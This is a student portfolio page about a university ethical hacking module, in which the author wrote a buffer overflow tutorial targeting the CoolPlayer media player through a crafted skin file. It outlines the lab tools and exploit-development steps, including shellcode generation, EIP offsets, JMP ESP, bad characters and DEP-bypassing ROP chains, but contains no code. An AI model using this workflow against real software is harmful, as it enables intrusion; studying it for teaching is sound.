easteregg Leprechaun
  • Patrick Collins
    • Home
    • Blog
      • eJPTv1 Certification
      • Conferences
      • Blog Home
    • Travel Photos
    • Notes
    • Graduation!
    • Projects and University Work
      • Honours Project
      • Web App Pen Test
      • All projects
    • Socials
    • About Me

    Exploit Development

    Page completely filled with 1's and 0's

    About

    • Module: CMP320
    • Title: Advanced Ethical Hacking
    • Grade: A+
    • Overall Module Grade: A

    This was a really fun module. After learning about buffer overflow exploits and how they are done I was tasked to create a tutorial on buffer overflow exploits for someone like myself who had no idea about them beforehand.

    Target Application

    CoolPlayer was the target media player application used for the tutorial and is apparently vulnerable to a buffer overflow attack using its skin importing feature. Once a carefully crafted skin containing overflow code is opened it should cause the exploit to occur and give an attacker control of the application. The target application was tested by the investigator for buffer overflow exploits against DEP disabled and DEP enabled in OPT out mode.


    Methodology

    Windows XP SP3 Virtual Machine
    The exploit development environment used a Virtual Machine of Windows XP SP3 release 5.1.2600 operating system. The exploits developed in this tutorial were entirely developed under this operating system and in this virtual machine.

    Debugging Application
    In the tutorial two debuggers were used to investigate the application. OllyDbg v1.10 was used for most of the tutorial and investigation for proof of concept(POC) exploits. The more advanced sections used Immunity Debugger v1.85 such as finding bad characters and generating ROP chains.

    Generating Shellcode
    To create the shellcode used in the Perl scripts Metasploit Framework MSFGUI v4.4.1- release is used. A very helpful and easy to use tool that was installed on the Windows XP SP3 VM.

    Pattern Creation
    Character patterns used in the scripts were created using executable versions of Metasploit's pattern creation tools. They include pattern_offset.exe, pattern_create.exe. They are used to calculate the exact distance to the EIP.

    Catching Shells
    Netcat v1.10 is how shells are caught from the advanced exploit section of the tutorial, using a listener on the XP machine.

    Scripting
    Perl v5.10.1 is the scripting language used in the tutorial to create the “.ini” skin file that is loaded into the target application. Findjmp.exe is a tool used to find a JMP ESP address in a “.dll” file for the exploit script. Mona.py is a python script used in Immunity Debugger to find bad characters in the application and for generating ROP chains to bypass DEP. It can be downloaded here. Mona.py was placed in the program files of Immunity Debugger in the “PyCommands” folder.

    White Paper

    My finished white paper for the Advanced Ethical Hacking assignment can be read below.

    Please DO NOT plagiarise my white paper. You will be caught, it's not worth it.

    Copyright © 2022-2025 Patrick Collins
    Contact Me: Contact@paddylonglegs.site
    Background created by freepik